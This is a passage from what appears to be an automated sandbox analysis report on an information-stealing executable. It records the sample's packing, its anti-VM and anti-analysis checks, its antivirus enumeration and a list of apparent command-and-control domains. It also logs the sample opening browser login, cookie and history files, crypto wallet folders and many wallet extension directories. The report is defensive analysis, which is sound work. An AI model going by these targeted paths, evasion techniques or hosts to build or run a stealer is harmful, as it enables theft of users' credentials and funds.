Source: C:\Users\user\Desktop\ji2xlo1f.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\ji2xlo1f.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\ji2xlo1f.exe | Section loaded: webio.dll
Source: C:\Users\user\Desktop\ji2xlo1f.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\ji2xlo1f.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\ji2xlo1f.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\ji2xlo1f.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\ji2xlo1f.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\ji2xlo1f.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\ji2xlo1f.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\ji2xlo1f.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\ji2xlo1f.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\ji2xlo1f.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\ji2xlo1f.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\ji2xlo1f.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\ji2xlo1f.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\ji2xlo1f.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\ji2xlo1f.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\ji2xlo1f.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\ji2xlo1f.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\ji2xlo1f.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\ji2xlo1f.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\ji2xlo1f.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\ji2xlo1f.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\ji2xlo1f.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\ji2xlo1f.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\ji2xlo1f.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\ji2xlo1f.exe | Section loaded: version.dll
Source: ji2xlo1f.exe | Static file information: File size 6289408 > 1048576
Source: ji2xlo1f.exe | Static PE information: Raw size of .vmp is bigger than: 0x100000 < 0x5d1000
Source: ji2xlo1f.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: initial sample | Static PE information: section where entry point is pointing to: .vmp
Source: ji2xlo1f.exe | Static PE information: section name: .vmp
Source: C:\Users\user\Desktop\ji2xlo1f.exe | Code function: 1_3_016F4918 push eax; retf 1_3_016F4919
Source: C:\Users\user\Desktop\ji2xlo1f.exe | Code function: 1_3_016F804B push dword ptr [ebx]; iretd 1_3_016F80B7
Source: C:\Users\user\Desktop\ji2xlo1f.exe | Code function: 1_3_016F9FF8 push ss; ret 1_3_016FA01B
Source: C:\Users\user\Desktop\ji2xlo1f.exe | Code function: 1_3_016F83D9 push FFFFFF8Fh; ret 1_3_016F83DB
Source: C:\Users\user\Desktop\ji2xlo1f.exe | Code function: 1_3_016FA6D2 push ebp; retf 1_3_016FA78D
Source: C:\Users\user\Desktop\ji2xlo1f.exe | Code function: 1_3_016F90A6 push ss; retf 1_3_016F90B0
Source: C:\Users\user\Desktop\ji2xlo1f.exe | Code function: 1_3_016F9888 push ebp; iretd 1_3_016F9899
Source: C:\Users\user\Desktop\ji2xlo1f.exe | Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

Source: C:\Users\user\Desktop\ji2xlo1f.exe | System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\ji2xlo1f.exe | API/Special instruction interceptor: Address: F61EF7
Source: C:\Users\user\Desktop\ji2xlo1f.exe | API/Special instruction interceptor: Address: F32D9D
Source: C:\Users\user\Desktop\ji2xlo1f.exe | API/Special instruction interceptor: Address: EB5DCB
Source: C:\Users\user\Desktop\ji2xlo1f.exe | API/Special instruction interceptor: Address: E36B3D
Source: C:\Users\user\Desktop\ji2xlo1f.exe | API/Special instruction interceptor: Address: EAAEDE
Source: C:\Users\user\Desktop\ji2xlo1f.exe | API/Special instruction interceptor: Address: 9E7BFF
Source: C:\Users\user\Desktop\ji2xlo1f.exe | API/Special instruction interceptor: Address: ADC48C
Source: C:\Users\user\Desktop\ji2xlo1f.exe TID: 5264 | Thread sleep time: -210000s >= -30000s
Source: C:\Users\user\Desktop\ji2xlo1f.exe TID: 5264 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\ji2xlo1f.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: ji2xlo1f.exe, 00000001.00000003.2369051268.0000000003D60000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: ji2xlo1f.exe, 00000001.00000003.2369051268.0000000003D60000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: ji2xlo1f.exe, 00000001.00000003.2369051268.0000000003D60000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: ji2xlo1f.exe, 00000001.00000003.2369051268.0000000003D60000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696487552f
Source: ji2xlo1f.exe, 00000001.00000003.2369051268.0000000003D60000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: ji2xlo1f.exe, 00000001.00000003.2369051268.0000000003D60000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: ji2xlo1f.exe, 00000001.00000002.2584910256.000000000162E000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000002.2584910256.0000000001695000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242782782.0000000001695000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2571620686.0000000001694000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280774238.0000000001695000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: ji2xlo1f.exe, 00000001.00000003.2369051268.0000000003D60000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: ji2xlo1f.exe, 00000001.00000003.2369051268.0000000003D60000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: ji2xlo1f.exe, 00000001.00000003.2369051268.0000000003D60000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: ji2xlo1f.exe, 00000001.00000003.2369051268.0000000003D60000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696487552
Source: ji2xlo1f.exe, 00000001.00000003.2369051268.0000000003D60000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696487552o
Source: ji2xlo1f.exe, 00000001.00000003.2368973258.0000000003D6D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: - GDCDYNVMware20,11696487552p
Source: ji2xlo1f.exe, 00000001.00000003.2369051268.0000000003D60000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696487552
Source: ji2xlo1f.exe, 00000001.00000003.2369051268.0000000003D60000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: ji2xlo1f.exe, 00000001.00000003.2369051268.0000000003D60000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: ji2xlo1f.exe, 00000001.00000003.2369051268.0000000003D60000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696487552j
Source: ji2xlo1f.exe, 00000001.00000003.2369051268.0000000003D60000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: ji2xlo1f.exe, 00000001.00000003.2369051268.0000000003D60000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: ji2xlo1f.exe, 00000001.00000003.2369051268.0000000003D60000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: ji2xlo1f.exe, 00000001.00000003.2369051268.0000000003D60000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: ji2xlo1f.exe, 00000001.00000003.2369051268.0000000003D60000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: ji2xlo1f.exe, 00000001.00000003.2369051268.0000000003D60000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: ji2xlo1f.exe, 00000001.00000003.2369051268.0000000003D60000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: ji2xlo1f.exe, 00000001.00000003.2369051268.0000000003D60000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                Source: ji2xlo1f.exe, 00000001.00000003.2369051268.0000000003D60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                Source: ji2xlo1f.exe, 00000001.00000003.2369051268.0000000003D60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                Source: ji2xlo1f.exe, 00000001.00000003.2369051268.0000000003D60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
                Source: ji2xlo1f.exe, 00000001.00000003.2369051268.0000000003D60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                Source: ji2xlo1f.exe, 00000001.00000003.2369051268.0000000003D60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                Source: ji2xlo1f.exe, 00000001.00000003.2369051268.0000000003D60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                Source: ji2xlo1f.exe, 00000001.00000003.2369051268.0000000003D60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                Source: ji2xlo1f.exe, 00000001.00000003.2369051268.0000000003D60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                Source: C:\Users\user\Desktop\ji2xlo1f.exeProcess information queried: ProcessInformationJump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: ji2xlo1f.exe, 00000001.00000002.2583051375.00000000006E1000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: moutheventushz.shop
Source: ji2xlo1f.exe, 00000001.00000002.2583051375.00000000006E1000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: respectabosiz.shop
Source: ji2xlo1f.exe, 00000001.00000002.2583051375.00000000006E1000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: bakedstusteeb.shop
Source: ji2xlo1f.exe, 00000001.00000002.2583051375.00000000006E1000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: conceszustyb.shop
Source: ji2xlo1f.exe, 00000001.00000002.2583051375.00000000006E1000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: nightybinybz.shop
Source: ji2xlo1f.exe, 00000001.00000002.2583051375.00000000006E1000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: standartedby.shop
Source: ji2xlo1f.exe, 00000001.00000002.2583051375.00000000006E1000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: mutterissuen.shop
Source: ji2xlo1f.exe, 00000001.00000002.2583051375.00000000006E1000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: worddosofrm.shop
Source: ji2xlo1f.exe, 00000001.00000002.2583051375.00000000006E1000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: terracedjz.cyou
Source: C:\Users\user\Desktop\ji2xlo1f.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\ji2xlo1f.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: ji2xlo1f.exe, 00000001.00000003.2491396441.00000000016F3000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000002.2585241320.00000000016EF000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2490993370.00000000016E7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2506963341.00000000016E7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\ji2xlo1f.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Source: Yara match | File source: Process Memory Space: ji2xlo1f.exe PID: 4176, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Source: ji2xlo1f.exe | String found in binary or memory: %appdata%\Electrum\wallets
Source: ji2xlo1f.exe | String found in binary or memory: %appdata%\ElectronCash\wallets
Source: ji2xlo1f.exe | String found in binary or memory: Jaxx Liberty
Source: ji2xlo1f.exe, 00000001.00000003.2458550592.000000000169A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: window-state.json
Source: ji2xlo1f.exe, 00000001.00000003.2446810949.000000000169A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: ji2xlo1f.exe | String found in binary or memory: ExodusWeb3
Source: ji2xlo1f.exe, 00000001.00000003.2458550592.000000000169A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Ethereum
Source: ji2xlo1f.exe, 00000001.00000002.2584910256.00000000016E5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: ji2xlo1f.exe, 00000001.00000002.2584910256.00000000016E5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: keystore
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflа
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\Desktop\ji2xlo1f.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
